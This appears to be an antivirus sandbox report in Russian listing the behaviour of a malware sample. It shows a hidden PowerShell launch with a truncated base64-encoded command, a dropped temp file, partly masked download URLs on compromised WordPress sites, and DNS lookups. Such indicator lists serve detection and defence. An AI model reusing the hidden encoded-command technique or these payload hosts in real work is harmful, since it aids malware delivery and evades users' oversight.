Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABEAGwAdQB4AG4AegB2AGYAbABrAD0AJwBLAHQAdwBqAG0AZQBqAHgAZwAnADsAJABIAHkAaABvAHcAeQBqAHAAbABzAG0AcwAgAD0AIAAnADUANwAnADsAJABCAGwAbABhAGIAbwByAGYAPQAnAEYAYwBlAGc...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 2012
- %TEMP%\1117840.cvr
- 'vi##-bd.com':80
- 'kw######niastokrotka.com':80
- 'kw######niastokrotka.com':443
- http://vi##-bd.com/jet1/gbtvinh/
- http://kw######niastokrotka.com/wp-content/vb1v/
- http://www.kw######niastokrotka.com/wp-content/vb1v/
- 'kw######niastokrotka.com':443
- DNS ASK vi##-bd.com
- DNS ASK sz####ia.budniq.com
- DNS ASK ua###say.com
- DNS ASK ju###ituan.com
- DNS ASK kw######niastokrotka.com